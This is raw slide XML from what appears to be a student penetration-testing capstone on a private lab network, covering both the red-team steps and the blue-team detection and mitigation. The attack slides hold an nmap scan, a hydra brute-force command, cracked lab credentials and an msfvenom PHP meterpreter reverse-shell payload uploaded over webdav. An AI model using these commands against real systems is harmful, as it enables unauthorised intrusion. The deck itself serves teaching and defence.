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46F1A9-8A7A-4F2C-9713-6A333E516305}">
  <a:tblStyle styleId="{2446F1A9-8A7A-4F2C-9713-6A333E5163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40058d42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40058d42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fdd85718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fdd85718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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4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9.png"/><Relationship Id="rId4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Relationship Id="rId5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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="324400"/>
            <a:ext cx="38610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4CCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="F4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4CCCC"/>
                </a:solidFill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1600">
                <a:solidFill>
                  <a:srgbClr val="F4CC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F4CCCC"/>
                </a:solidFill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1600">
              <a:solidFill>
                <a:srgbClr val="F4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" name="Google Shape;1020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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7677600" y="4743250"/>
            <a:ext cx="14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</a:rPr>
              <a:t>Edward Frank</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="C9DAF8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Local File Inclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1129" name="Google Shape;1129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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="752775" y="1111525"/>
            <a:ext cx="2371500" cy="21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Used crackstation to find Ryan’s password with a hash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Connected to webdav directory and uploaded .php file with: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msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 &gt; shell.php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1" name="Google Shape;1131;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="190906" y="917090"/>
            <a:ext cx="533372" cy="563492"/>
            <a:chOff x="110035" y="1416862"/>
            <a:chExt cx="695400" cy="734575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1132" name="Google Shape;1132;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="110035" y="141686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3" name="Google Shape;1133;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="287562" y="1962811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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="190906" y="3470753"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1135" name="Google Shape;113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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="3470750"/>
            <a:ext cx="24285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The password, linux4u, was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decrypted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and used with username Ryan to log into webdav directory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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5848931" y="1264040"/>
            <a:ext cx="533372" cy="548942"/>
            <a:chOff x="85427" y="1868172"/>
            <a:chExt cx="695400" cy="715607"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="85427" y="186817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207608" y="2395154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1" name="Google Shape;11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025" y="1918788"/>
            <a:ext cx="3171400" cy="22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025" y="4201700"/>
            <a:ext cx="5652650" cy="5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078" y="2032334"/>
            <a:ext cx="2758594" cy="2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Code Execution/Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="752775" y="148057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Ran the .php file on the target machine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searched the home directory with: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locate flag.txt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1" name="Google Shape;1151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2" name="Google Shape;1152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3" name="Google Shape;1153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5" name="Google Shape;1155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6" name="Google Shape;1156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the payload on the target machine the attacker was able to execute the code and listen to target to find the flag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9" name="Google Shape;1159;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5851731" y="901740"/>
            <a:ext cx="533372" cy="519642"/>
            <a:chOff x="184025" y="1414906"/>
            <a:chExt cx="695400" cy="677411"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1160" name="Google Shape;1160;p64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="184025" y="1414906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64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="378273" y="1903693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2" name="Google Shape;11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25" y="4043213"/>
            <a:ext cx="2624725" cy="6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725" y="1610475"/>
            <a:ext cx="2693250" cy="22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0" name="Google Shape;1170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  <mc:AlternateContent>
    <mc:Choice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76" name="Google Shape;1176;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="70075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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490900" y="70075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Due to the spike in traffic, a port scan can be identified on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>illustration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> below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attack was confirmed to be on July 31, 2022 around 21:00 from IP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29,042</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> took place in this time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78" name="Google Shape;11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782913"/>
            <a:ext cx="85153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4" name="Google Shape;1184;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="60437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15,769 request at 21:00 on July 31, 2022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secret folder contained a hash for user Ryan that was used to upload the payload to the system and also how to reach the webdav server</a:t>
            </a:r>
            <a:endParaRPr sz="120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25" y="3361374"/>
            <a:ext cx="8032976" cy="13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7100" y="1496325"/>
            <a:ext cx="4100736" cy="15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750" y="1496325"/>
            <a:ext cx="4037649" cy="15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293725" y="692475"/>
            <a:ext cx="44835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15,769 requests were made in the attack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Four attempts were made before the attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>discovered the password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975" y="4063200"/>
            <a:ext cx="5166043" cy="7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562" y="1505225"/>
            <a:ext cx="6606870" cy="24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500" y="692475"/>
            <a:ext cx="4118725" cy="8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2" name="Google Shape;1202;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196075" y="11726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files webdav and shell.php were requested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34 request were made to webdav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36 request were made to webdav/shell.php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03" name="Google Shape;12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36" y="1855321"/>
            <a:ext cx="7541925" cy="28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0" name="Google Shape;1210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  <mc:AlternateContent>
    <mc:Choice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6" name="Google Shape;1216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threshold of 500 TCP connections over multiple ports per minute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7" name="Google Shape;121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best way to mitigate port scanning is to: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IDS/IPS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identify and close open ports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firewall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ufw default deny incoming</a:t>
            </a:r>
            <a:endParaRPr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 honeypot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18" name="Google Shape;12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50" y="2547175"/>
            <a:ext cx="4440399" cy="20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4" name="Google Shape;122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 an alarm when any hidden directory is accessed by IP addresses that is not whitelisted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 a threshold of 5 consecutive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> to authenticate until it triggers an alert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5" name="Google Shape;1225;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4638775" y="13527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Direct access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> should be disabled by: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Remove directories from the server and use software such as wordpress for logged in users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Creating or editing the .htaccess file to include “options-indexes” which will prevent attacker from listing directories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 firewall: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sudo ufw default deny all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">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo ufw default allow from 192.168.1.0/24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1" name="Google Shape;1231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Alarm set to 100 login attempts per hour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Alarm set for any time 10  401 status code are returned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Alarm set if a user gets locked out due to a rule of only allowing four login attempts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2" name="Google Shape;1232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Disabling accounts after a specified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> of tries is the first step but may not always be the best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Creating a delay after password verification will slow a BFA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Use CAPTCHAs-  select tiles in pictures with certain objects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8" name="Google Shape;1238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An alert should be sent anytime this directory is accessed by any IP other than the  ones that should have access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Also create an alert for any file upload to the webdav directory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9" name="Google Shape;1239;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4635700" y="1604700"/>
            <a:ext cx="41295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lang="en" sz="1400"/>
              <a:t>web server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> should communicate through HTTPS so that it is encrypted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Make sure all users have complex username and passwords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Also, only give write access if the user is on a whitelist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5" name="Google Shape;1245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prevent the reverse shell, things that should be prevented are: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traffic that is using port 4444 since it is the default listener for metasploit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.php or executable file that is uploaded to the server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6" name="Google Shape;1246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Either completely take the ability to upload files to the webdav directory or require authorization for all files being uploaded, would eliminate attackers from getting a shell on the system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1054" name="Google Shape;10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189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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7049150" y="786475"/>
            <a:ext cx="1814100" cy="4006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Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Range: 192.168.1.0/24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Netmask: 255.255.255.0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Gateway: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.0.0.1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IPv4: 192.168.1.1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OS: Microsoft Windows 10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Hostname: ML-RefVm-684427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IPv4:192.168.1.100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OS:Linux 4.15.0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Hostname: ELK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IPv4:192.168.1.105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OS:  Linux 4.1.15.0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Hostname: CAPSTONE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IPv4: 192.168.1.90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OS: Linux 5.4.0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Hostname: KALI LINUX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1" name="Google Shape;1061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62" name="Google Shape;10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850" y="750500"/>
            <a:ext cx="4651514" cy="4078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9" name="Google Shape;1069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p14:dur="400">
        <p14:flip dir="l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{2446F1A9-8A7A-4F2C-9713-6A333E516305}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Hypervisor/ Host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 server/ Apache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machine/ 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machine/ Penetration testing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3" name="Google Shape;1083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{2446F1A9-8A7A-4F2C-9713-6A333E516305}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Server 2.4.29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CVE-2017-15710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out of date Apache Server gives access to the secret directory through an open port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 to gain access through open port 80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a password cracker/ word list to gain access by guessing the password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Very high impact including ID theft, loss of files and potential  downtime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LFI: Local File Inclusion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CVE-2021021804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 to access secret folders or upload a payload into apps or servers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could gather usernames, log files, application information or use it with RCE.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RCE: Remote Code Execution (Reverse Shell)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CVE-2021-40222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malicious code to be executed by an attacker from a remote PC to take control of target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Very high impact including full control of the system with root privileges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Apache Server 2.4.29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CVE-2017-15710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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480625"/>
            <a:ext cx="25368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nmap -sV 192.168.1.0/24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Able to access the hidden directory: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192.168.1.105/comany_folders/secret_folders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1" name="Google Shape;1091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2" name="Google Shape;109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3" name="Google Shape;109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" name="Google Shape;1097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nmap discovered 256 IP addresses with 4 host running. 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Of the 4 host, 192.168.1.105 had an open port 80 with Apache 2.4.29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9" name="Google Shape;1099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0" name="Google Shape;110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1" name="Google Shape;110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2" name="Google Shape;11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1480575"/>
            <a:ext cx="2428501" cy="32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Weak Password Authentication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8" name="Google Shape;1108;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="2489775"/>
            <a:ext cx="2428500" cy="2145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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552275" y="2208425"/>
            <a:ext cx="28233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Brute force with command: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	hydra -l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get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/customer_folder/secret_folder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Login to: 192.168.1.105/company_folders/secret_folder/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with: ashton-leopoldo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0" name="Google Shape;1110;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="724281" y="1871828"/>
            <a:ext cx="533372" cy="548755"/>
            <a:chOff x="805440" y="2661468"/>
            <a:chExt cx="695400" cy="715363"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1111" name="Google Shape;1111;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="805440" y="266146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2" name="Google Shape;1112;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="982966" y="3188206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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="2489850"/>
            <a:ext cx="2428500" cy="2145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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3522675" y="2489850"/>
            <a:ext cx="2428500" cy="21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Ashton’s username and password were cracked leaving access to the target machine including the hidden directory /secret_folders and revealing Ryan’s hash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00" y="780250"/>
            <a:ext cx="8105400" cy="7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550" y="1722495"/>
            <a:ext cx="3219451" cy="169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275" y="3509825"/>
            <a:ext cx="2905124" cy="116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8" name="Google Shape;1118;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5281506" y="1879465"/>
            <a:ext cx="584875" cy="476599"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="762549" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1119" name="Google Shape;111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5400000">
              <a:off x="955283" y="1595148"/>
              <a:ext cx="340281" cy="188650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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3496056" y="1814953"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="69545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